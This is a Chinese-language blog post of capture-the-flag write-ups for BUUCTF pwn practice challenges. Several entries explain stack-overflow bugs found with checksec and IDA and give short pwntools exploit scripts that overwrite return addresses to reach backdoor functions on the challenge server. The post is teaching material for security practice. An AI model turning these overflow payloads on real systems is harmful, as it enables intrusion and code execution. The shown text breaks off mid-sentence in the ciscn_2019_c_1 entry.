<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>buuctf平台pwn刷题WP | dota_st</title><meta name="keywords" content="PWN"><meta name="author" content="dota_st"><meta name="copyright" content="dota_st"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><meta name="description" content="¶test_your_nc 没啥好说的，nc 连接上去之后读取flag 123nc node4.buuoj.cn 27874cat flag ¶rip ¶知识点：栈溢出，ret2text 先用 checksec 检查一下程序  没有开启任何保护，放到 ida 中按 F5 分析伪代码  看见典型的 gets 函数导致栈溢出，gets函数是一个危险函数。因为它不检查输入的字符串长度，而是以回车来判断结"><meta property="og:type" content="article"><meta property="og:title" content="buuctf平台pwn刷题WP"><meta property="og:url" content="https://www.wlhhlc.top/posts/6613/index.html"><meta property="og:site_name" content="dota_st"><meta property="og:description" content="¶test_your_nc 没啥好说的，nc 连接上去之后读取flag 123nc node4.buuoj.cn 27874cat flag ¶rip ¶知识点：栈溢出，ret2text 先用 checksec 检查一下程序  没有开启任何保护，放到 ida 中按 F5 分析伪代码  看见典型的 gets 函数导致栈溢出，gets函数是一个危险函数。因为它不检查输入的字符串长度，而是以回车来判断结"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="https://blog-file-1302856486.file.myqcloud.com/buuctf-pwn%E5%88%B7%E9%A2%98/5d4c6aff824a4ee2894929d50d72c7e8.jpg"><meta property="article:published_time" content="2021-11-22T14:58:59.000Z"><meta property="article:modified_time" content="2021-11-22T16:38:44.859Z"><meta property="article:author" content="dota_st"><meta property="article:tag" content="PWN"><meta name="twitter:card" content="summary"><meta name="twitter:image" content="https://blog-file-1302856486.file.myqcloud.com/buuctf-pwn%E5%88%B7%E9%A2%98/5d4c6aff824a4ee2894929d50d72c7e8.jpg"><link rel="shortcut icon" href="https://cdn.jsdelivr.net/gh/dota-st/blog_file/E595997D44EF7013BFD08323A4506527.png"><link rel="canonical" href="https://www.wlhhlc.top/posts/6613/"><link rel="preconnect" href="//cdn.jsdelivr.net"><link rel="preconnect" href="//busuanzi.ibruce.info"><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><script>var GLOBAL_CONFIG = { 
  root: '/',
  hexoversion: '5.2.0',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容：${query}"}},
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: undefined,
  ClickShowText: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  justifiedGallery: {
    js: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/js/jquery.justifiedGallery.min.js',
    css: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/css/justifiedGallery.min.css'
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isanchor: false
};

var saveToLocal = {
  set: function setWithExpiry(key, value, ttl) {
    const now = new Date()
    const expiryDay = ttl * 86400000
    const item = {
      value: value,
      expiry: now.getTime() + expiryDay,
    }
    localStorage.setItem(key, JSON.stringify(item))
  },

  get: function getWithExpiry(key) {
    const itemStr = localStorage.getItem(key)

    if (!itemStr) {
      return undefined
    }
    const item = JSON.parse(itemStr)
    const now = new Date()

    if (now.getTime() > item.expiry) {
      localStorage.removeItem(key)
      return undefined
    }
    return item.value
  }
}</script><script id="config_change">var GLOBAL_CONFIG_SITE={isPost:!0,isHome:!1,isHighlightShrink:!1,isSidebar:!0,postUpdate:"2021-11-23 00:38:44"}</script><noscript><style>#nav{opacity:1}.justified-gallery img{opacity:1}#post-meta time,#recent-posts time{display:inline!important}</style></noscript><script>(function () {
  window.activateDarkMode = function () {
    document.documentElement.setAttribute('data-theme', 'dark')
    if (document.querySelector('meta[name="theme-color"]') !== null) {
      document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
    }
  }
  window.activateLightMode = function () {
    document.documentElement.setAttribute('data-theme', 'light')
    if (document.querySelector('meta[name="theme-color"]') !== null) {
      document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
    }
  }

  const autoChangeMode = 'false'
  const t = saveToLocal.get('theme')
  if (autoChangeMode === '1') {
    const isDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches
    const isLightMode = window.matchMedia('(prefers-color-scheme: light)').matches
    const isNotSpecified = window.matchMedia('(prefers-color-scheme: no-preference)').matches
    const hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

    if (t === undefined) {
      if (isLightMode) activateLightMode()
      else if (isDarkMode) activateDarkMode()
      else if (isNotSpecified || hasNoSupport) {
        const now = new Date()
        const hour = now.getHours()
        const isNight = hour <= 6 || hour >= 18
        isNight ? activateDarkMode() : activateLightMode()
      }
      window.matchMedia('(prefers-color-scheme: dark)').addListener(function (e) {
        if (saveToLocal.get('theme') === undefined) {
          e.matches ? activateDarkMode() : activateLightMode()
        }
      })
    } else if (t === 'light') activateLightMode()
    else activateDarkMode()
  } else if (autoChangeMode === '2') {
    const now = new Date()
    const hour = now.getHours()
    const isNight = hour <= 6 || hour >= 18
    if (t === undefined) isNight ? activateDarkMode() : activateLightMode()
    else if (t === 'light') activateLightMode()
    else activateDarkMode()
  } else {
    if (t === 'dark') activateDarkMode()
    else if (t === 'light') activateLightMode()
  }
})()</script><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/dota-st/blog_file/background.min.css"><meta name="referrer" content="no-referrer-when-downgrade"><meta name="generator" content="Hexo 5.2.0"></head><body><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/GamerNoTitle/Picture-repo-v1@master/css/APlayer.min.css"><div id="aplayer"></div><script src="https://cdn.jsdelivr.net/gh/GamerNoTitle/Picture-repo-v1@master/js/APlayer.min.js"></script><div id="loading-box"><div class="loading-left-bg"></div><div class="loading-right-bg"></div><div class="spinner-box"><div class="configure-border-1"><div class="configure-core"></div></div><div class="configure-border-2"><div class="configure-core"></div></div><div class="loading-word">加载中...</div></div></div><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" src="https://blog-file-1302856486.file.myqcloud.com/%E5%A4%B4%E5%83%8F.png" onerror='onerror=null,src="/img/friend_404.gif"' alt="avatar"></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">文章</div><div class="length_num">20</div></a></div></div><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/tags/"><div class="headline">标签</div><div class="length_num">6</div></a></div></div></div><hr><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i> <span>首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i> <span>时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i> <span>标签</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fa fa-link"></i> <span>友链</span></a></div><div class="menus_item"><a class="site-page" href="/messageboard/"><i class="fa-fw fa fa-paper-plane"></i> <span>留言板</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i> <span>关于我</span></a></div></div></div></div><div id="body-wrap"><div id="web_bg"></div><div id="sidebar"><i class="fas fa-arrow-right on" id="toggle-sidebar"></i><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#test-your-nc"><span class="toc-number">1.</span> <span class="toc-text">test_your_nc</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#rip"><span class="toc-number">2.</span> <span class="toc-text">rip</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9F%A5%E8%AF%86%E7%82%B9%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8Cret2text"><span class="toc-number">2.1.</span> <span class="toc-text">知识点：栈溢出，ret2text</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#warmup-csaw-2016"><span class="toc-number">3.</span> <span class="toc-text">warmup_csaw_2016</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9F%A5%E8%AF%86%E7%82%B9%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8Cret2text-v2"><span class="toc-number">3.1.</span> <span class="toc-text">知识点：栈溢出，ret2text</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ciscn-2019-n-1"><span class="toc-number">4.</span> <span class="toc-text">ciscn_2019_n_1</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9F%A5%E8%AF%86%E7%82%B9%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%A6%86%E7%9B%96%E5%8F%98%E9%87%8F%E5%80%BC"><span class="toc-number">4.1.</span> <span class="toc-text">知识点：栈溢出，覆盖变量值</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#pwn1-sctf-2016"><span class="toc-number">5.</span> <span class="toc-text">pwn1_sctf_2016</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9F%A5%E8%AF%86%E7%82%B9%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BAret2text"><span class="toc-number">5.1.</span> <span class="toc-text">知识点：栈溢出ret2text</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#jarvisoj-level0"><span class="toc-number">6.</span> <span class="toc-text">jarvisoj_level0</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9F%A5%E8%AF%86%E7%82%B9%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8Cret2text-v3"><span class="toc-number">6.1.</span> <span class="toc-text">知识点：栈溢出，ret2text</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ciscn-2019-c-1"><span class="toc-number">7.</span> <span class="toc-text">ciscn_2019_c_1</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9F%A5%E8%AF%86%E7%82%B9%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8Cret2libc3"><span class="toc-number">7.1.</span> <span class="toc-text">知识点：栈溢出，ret2libc3</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#babyrop"><span class="toc-number">8.</span> <span class="toc-text">babyrop</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9F%A5%E8%AF%86%E7%82%B9%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8Cret2libc3-v2"><span class="toc-number">8.1.</span> <span class="toc-text">知识点：栈溢出，ret2libc3</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ciscn-2019-n-8"><span class="toc-number">9.</span> <span class="toc-text">ciscn_2019_n_8</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#jarvisoj-level2"><span class="toc-number">10.</span> <span class="toc-text">jarvisoj_level2</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9F%A5%E8%AF%86%E7%82%B9%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8Cret2libc1"><span class="toc-number">10.1.</span> <span class="toc-text">知识点：栈溢出，ret2libc1</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AD%89%E5%BE%85%E6%9B%B4%E6%96%B0"><span class="toc-number">11.</span> <span class="toc-text">等待更新</span></a></li></ol></div></div></div><header class="post-bg" id="page-header" style="background-image:url(https://blog-file-1302856486.file.myqcloud.com/buuctf-pwn%E5%88%B7%E9%A2%98/5d4c6aff824a4ee2894929d50d72c7e8.jpg)"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">dota_st</a></span><span id="menus"><div id="search_button"><a class="site-page social-icon search"><i class="fas fa-search fa-fw"></i> <span>搜索</span></a></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i> <span>首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i> <span>时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i> <span>标签</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fa fa-link"></i> <span>友链</span></a></div><div class="menus_item"><a class="site-page" href="/messageboard/"><i class="fa-fw fa fa-paper-plane"></i> <span>留言板</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i> <span>关于我</span></a></div></div><span class="close" id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></span></span></nav><div id="post-info"><div id="post-title"><div class="posttitle">buuctf平台pwn刷题WP</div></div><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2021-11-22T14:58:59.000Z" title="发表于 2021-11-22 22:58:59">2021-11-22</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2021-11-22T16:38:44.859Z" title="更新于 2021-11-23 00:38:44">2021-11-23</time></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-wordcount"><i class="far fa-file-word fa-fw post-meta-icon"></i><span class="post-meta-label">字数总计:</span><span class="word-count">2.1k</span><span class="post-meta-separator">|</span><i class="far fa-clock fa-fw post-meta-icon"></i><span class="post-meta-label">阅读时长:</span><span>9分钟</span></span><span class="post-meta-separator">|</span><span class="post-meta-pv-cv"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout_post" id="content-inner"><article id="post"><div class="post-content" id="article-container"><h2 id="test-your-nc"><a class="header-anchor" href="#test-your-nc">¶</a>test_your_nc</h2><p>没啥好说的，nc 连接上去之后读取flag</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">nc node4.buuoj.cn 27874</span><br><span class="line"></span><br><span class="line">cat flag</span><br></pre></td></tr></table></figure><h2 id="rip"><a class="header-anchor" href="#rip">¶</a>rip</h2><h3 id="知识点：栈溢出，ret2text"><a class="header-anchor" href="#知识点：栈溢出，ret2text">¶</a>知识点：栈溢出，ret2text</h3><p>先用 checksec 检查一下程序<br><img src="https://blog-file-1302856486.file.myqcloud.com/buuctf-pwn%E5%88%B7%E9%A2%98/rip/%40W3I8USI%7D3TK%297O2FSRADUM.png" alt=""><br>没有开启任何保护，放到 ida 中按 F5 分析伪代码<br><img src="https://blog-file-1302856486.file.myqcloud.com/buuctf-pwn%E5%88%B7%E9%A2%98/rip/2BUEKW5650%25%7DUAD7216N%2459.png" alt=""><br>看见典型的 gets 函数导致栈溢出，<code>gets</code>函数是一个危险函数。因为它不检查输入的字符串长度，而是以回车来判断结束，因此容易导致栈溢出漏洞的产生。<br>双击 s，可以看到偏移量为<code>0x8-(-0xF)</code>，即 8+15=23。接着观察到程序已经预留一个后门函数<code>fun</code><br><img src="https://blog-file-1302856486.file.myqcloud.com/buuctf-pwn%E5%88%B7%E9%A2%98/rip/T%25NRG%25J9V4NV56W%5D41%25%40%7D35.png" alt=""><br>所以我们只需要覆盖返回地址为后门函数即可，fun 函数地址也可以在 ida 中观察得到：0x401186<br><img src="https://blog-file-1302856486.file.myqcloud.com/buuctf-pwn%E5%88%B7%E9%A2%98/rip/0ZR%40NB~%24DFSCP7E9I7DAIZS.png" alt=""><br>编写exp</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = remote(<span class="string">&quot;node4.buuoj.cn&quot;</span>,<span class="number">29798</span>)</span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">23</span> + p64(<span class="number">0x401186</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><p>但是运行失败，因为远程环境是 ubuntu18，64位的程序则需要考虑堆栈平衡的问题，我们可以通过加一个 ret 指令去使其16字节对齐，寻找程序中 ret 的地址<br><img src="https://blog-file-1302856486.file.myqcloud.com/buuctf-pwn%E5%88%B7%E9%A2%98/rip/%243%29Y%25%5D%40%7BX%7D8QCU%7D_HQMJG%5DD.png" alt=""><br>用 <strong>ROPgadget</strong> 找到 ret 的地址为：0x401016，所以最终exp如下</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = remote(<span class="string">&quot;node4.buuoj.cn&quot;</span>,<span class="number">29798</span>)</span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">23</span> + p64(<span class="number">0x401016</span>) +p64(<span class="number">0x401186</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><h2 id="warmup-csaw-2016"><a class="header-anchor" href="#warmup-csaw-2016">¶</a>warmup_csaw_2016</h2><h3 id="知识点：栈溢出，ret2text-v2"><a class="header-anchor" href="#知识点：栈溢出，ret2text-v2">¶</a>知识点：栈溢出，ret2text</h3><p>首先用 checksec 检查没有任何保护，并且是64位程序，丢进 ida 中查看伪代码</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">__int64 __fastcall <span class="title">main</span><span class="params">(<span class="keyword">int</span> a1, <span class="keyword">char</span> **a2, <span class="keyword">char</span> **a3)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> s[<span class="number">64</span>]; <span class="comment">// [rsp+0h] [rbp-80h] BYREF</span></span><br><span class="line">  <span class="keyword">char</span> v5[<span class="number">64</span>]; <span class="comment">// [rsp+40h] [rbp-40h] BYREF</span></span><br><span class="line"></span><br><span class="line">  write(<span class="number">1</span>, <span class="string">&quot;-Warm Up-\n&quot;</span>, <span class="number">0xA</span>uLL);</span><br><span class="line">  write(<span class="number">1</span>, <span class="string">&quot;WOW:&quot;</span>, <span class="number">4u</span>LL);</span><br><span class="line">  <span class="built_in">sprintf</span>(s, <span class="string">&quot;%p\n&quot;</span>, sub_40060D);</span><br><span class="line">  write(<span class="number">1</span>, s, <span class="number">9u</span>LL);</span><br><span class="line">  write(<span class="number">1</span>, <span class="string">&quot;&gt;&quot;</span>, <span class="number">1u</span>LL);</span><br><span class="line">  <span class="keyword">return</span> gets(v5);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>典型的 gets 函数栈溢出，双击 v5 查看偏移<br><img src="https://blog-file-1302856486.file.myqcloud.com/buuctf-pwn%E5%88%B7%E9%A2%98/warmup_csaw_2016/UOH6%604ZN8H4T3%24NA%28J%24DIDY.png" alt=""><br>同时可以在 sub_40060D 函数中发现有获取flag的命令</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">sub_40060D</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">return</span> system(<span class="string">&quot;cat flag.txt&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>编写exp</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = remote(<span class="string">&quot;node4.buuoj.cn&quot;</span>,<span class="number">28169</span>)</span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*(<span class="number">0x40</span>+<span class="number">8</span>) + p64(<span class="number">0x40060d</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><h2 id="ciscn-2019-n-1"><a class="header-anchor" href="#ciscn-2019-n-1">¶</a>ciscn_2019_n_1</h2><h3 id="知识点：栈溢出，覆盖变量值"><a class="header-anchor" href="#知识点：栈溢出，覆盖变量值">¶</a>知识点：栈溢出，覆盖变量值</h3><p>用 checksec 检测是64位程序，且只开了 NX 保护，在 ida 中查看伪代码</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">func</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> v1[<span class="number">44</span>]; <span class="comment">// [rsp+0h] [rbp-30h] BYREF</span></span><br><span class="line">  <span class="keyword">float</span> v2; <span class="comment">// [rsp+2Ch] [rbp-4h]</span></span><br><span class="line"></span><br><span class="line">  v2 = <span class="number">0.0</span>;</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Let&#x27;s guess the number.&quot;</span>);</span><br><span class="line">  gets(v1);</span><br><span class="line">  <span class="keyword">if</span> ( v2 == <span class="number">11.28125</span> )</span><br><span class="line">    <span class="keyword">return</span> system(<span class="string">&quot;cat /flag&quot;</span>);</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">puts</span>(<span class="string">&quot;Its value should be 11.28125&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>如果 v2 的值等于浮点数的 11.28125，而 v1 存在栈溢出，解题思路就是通过 v1 进行栈溢出，改写 v2 的值。观察栈<br><img src="https://blog-file-1302856486.file.myqcloud.com/buuctf-pwn%E5%88%B7%E9%A2%98/ciscn_2019_n_1/~1NU%24C3I4BNV9HQSV%7BD7%5DWA.png" alt="">可以看到 v1 在栈中的空间大小为 <strong>0x30-0x4=44</strong>，同时注意使用 p64 打包的时候只能打包整数，小数不可以，所以需要将 11.28125 转换为16进制的形式，在ida中也可以看到<br><img src="https://blog-file-1302856486.file.myqcloud.com/buuctf-pwn%E5%88%B7%E9%A2%98/ciscn_2019_n_1/SCOVYC%5B4BL%25W5JM%40WZ7ZV%24X.png" alt=""><br>编写exp</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = remote(<span class="string">&quot;node4.buuoj.cn&quot;</span>,<span class="number">29515</span>)</span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*(<span class="number">0x30</span><span class="number">-0x4</span>) + p64(<span class="number">0x41348000</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><h2 id="pwn1-sctf-2016"><a class="header-anchor" href="#pwn1-sctf-2016">¶</a>pwn1_sctf_2016</h2><h3 id="知识点：栈溢出ret2text"><a class="header-anchor" href="#知识点：栈溢出ret2text">¶</a>知识点：栈溢出ret2text</h3><p>用 checksec 检查程序为32位，只开启了 NX 保护，丢进 ida 中查看伪代码，跟进 vuln 函数<br><img src="https://blog-file-1302856486.file.myqcloud.com/buuctf-pwn%E5%88%B7%E9%A2%98/pwn1_sctf_2016/%5BIELG_U6LX%25%25H74%25F6A%60S81.png" alt=""><br>已经很明了，虽然只限制读入32个字节数据，但可以通过 <strong>I</strong> 变成 <strong>you</strong> 实现一个长度的字节变成三个长度的字节，导致栈溢出。双击 s<br><img src="https://blog-file-1302856486.file.myqcloud.com/buuctf-pwn%E5%88%B7%E9%A2%98/pwn1_sctf_2016/W3%282C%5B%7DK_4%7D%29%5B7G%7BSZH3WD6.png" alt="">可以看到 s 的栈空间为 0x3c，也就是60字节，60÷3=20，需要输入20个 I 即可填满栈空间，然后再用4个字节来覆盖ebp，加上返回地址，一共20+4=28，满足小于 32 长度的限制。点击 get_flag 即可看到该函数地址为 0x8048F0D，开始编写exp</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = remote(<span class="string">&quot;node4.buuoj.cn&quot;</span>, <span class="number">27160</span>)</span><br><span class="line">payload = <span class="string">&#x27;I&#x27;</span>*<span class="number">20</span> + <span class="string">&#x27;a&#x27;</span>*<span class="number">4</span> + p32(<span class="number">0x8048F0D</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><h2 id="jarvisoj-level0"><a class="header-anchor" href="#jarvisoj-level0">¶</a>jarvisoj_level0</h2><h3 id="知识点：栈溢出，ret2text-v3"><a class="header-anchor" href="#知识点：栈溢出，ret2text-v3">¶</a>知识点：栈溢出，ret2text</h3><p>checksec 检查程序为64位程序，导入 ida 查看伪代码，跟进 vulnerable_function</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">ssize_t</span> <span class="title">vulnerable_function</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> buf[<span class="number">128</span>]; <span class="comment">// [rsp+0h] [rbp-80h] BYREF</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> read(<span class="number">0</span>, buf, <span class="number">0x200</span>uLL);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>可以看见 buf 分配的栈空间大小只有 0x80，也就是128，而read可以输入200长度数据，导致栈溢出，后门函数地址为0x400596<br><img src="https://blog-file-1302856486.file.myqcloud.com/buuctf-pwn%E5%88%B7%E9%A2%98/jarvisoj_level0/%287%40J%5BVLHP0IFF%7BEH0%28%40Y5BV.png" alt=""><br>编写exp</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = remote(<span class="string">&quot;node4.buuoj.cn&quot;</span>, <span class="number">26330</span>)</span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">128</span> + <span class="string">&#x27;a&#x27;</span>*<span class="number">8</span> + p64(<span class="number">0x400596</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><h2 id="ciscn-2019-c-1"><a class="header-anchor" href="#ciscn-2019-c-1">¶</a>ciscn_2019_c_1</h2><h3 id="知识点：栈溢出，ret2libc3"><a class="header-anchor" href="#知识点：栈溢出，ret2libc3">¶</a>知识点：栈溢出，ret2libc3</h3><p>相关知识可以看我的另一篇博文：<code>https://www.wlhhlc.top/posts/54640/#无system-无-bin-sh</code></p><p>首先，checksec 检查程序为64位，且只开启了 NX 保护，丢进ida中观察伪代码，跟进 encrypt 函数<br><img src="https://blog-file-1302856486.file.myqcloud.com/buuctf-pwn%E5%88%B7%E9%A2%98/ciscn_2019_c_1/0W%5DX7%7BPI5~VG%28DIJWB%25GJS1.png" alt="">典型的栈溢出漏洞，双击变量s<br><img src="https://blog-file-1302856486.file.myqcloud.com/buuctf-pwn%E5%88%B7%E9%A2%98/ciscn_2019_c_1/Y%25EITOQT~%7B%294HFHG1R457DO.png" alt="">栈空间大小为0x50，但程序中没有 system 和 sh，所以需要我们去泄露 puts 